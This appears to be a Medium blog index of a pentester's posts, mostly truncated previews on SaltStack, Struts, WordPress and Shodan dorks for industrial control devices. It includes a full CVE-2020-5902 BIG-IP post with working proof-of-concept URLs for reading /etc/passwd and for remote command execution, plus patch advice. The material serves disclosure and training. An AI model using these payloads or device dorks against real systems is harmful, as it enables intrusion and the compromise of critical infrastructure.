Hi readers!! In this blog, I am talking about saltstack and latest vulnerability of remote code execution. Saltstack also known as Salt. and It is used in DevOps.

What is SaltStack?

SaltStack, also known as Salt, is a configuration management and orchestration tool. It uses a central repository to provision new servers and…


What is VulnMachines?

Hi Pentesters, This is Punit Darji. I have created a platform called VulnMachines. This platform is for people who are willing to learn about cyber security and pentesting with real life scenario. Therefore, I have decided to deliver real life based scenario labs with Basic to Advance…


What is Apache struts?

Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture.

What is root cause of vulnerability?

The root cause was a lack of input validation on the URL passed to the Struts framework.

Let’s begin,


Hi readers! In this post, I would like to share 2 years ago vulnerability of WordPress bug dos attack.

What is WordPress?

WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. …


Every Saturday I would like to spend time to discover new dorks‍ such as google dork‍, shodan‍ Fofa‍ and many other search engines. This Saturday I have spent my time to find dork of wordpress‍ with shodan‍.

WordPress is a website creation tool — an online open source CMS that…


Hi Readers! Saturday with Dork, I have posted dork of Big-IP vulnerability on Twitter. Attackers can run commands as an unauthorized user and completely compromise a system, including interception of controller application traffic. The vulnerability can be exploited remotely.

Vulnerability CVE-2020–5902 received a CVSS score of 10, indicating the highest degree of danger. To exploit it, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Proof of Concept LFI

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Proof of Concept RCE

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Proof of concept CVE-2020–5902

Affected companies are advised to update. Vulnerable versions of BIG-IP (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4).

If you like then share with your friends and infosec people :)

Hire me :)

https://in.linkedin.com/in/punit-darji-5500


Hi Readers! This is second blog related to dork. In this blog, I will show you Moxa universal controller and I/O ICS devices. Moxa Iologik supports the most often-used protocols for retrieving I/O data, making it capable of handling a wide variety of applications. …


Hello readers! In this series I am going to publish List of “Dorks” relented to PLC, SCADA, HMI, router, and many others. On my twitter, I have started series “Saturday with Shodan”. On Saturday, I spend my time with Shodan, ZoomEye, Google and other search engines and find the dorks.


Whenever I do pentesting, I always look backend because the developer experience helps me in Pentesting. I can understand the problem of developer because they have fixed time-line to deliver product or service. But the same case in Pentesting too :).

I have bypass OTP using http headers such as…

Rapid SafeGuard

Defensive Security with Black Hat minds

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store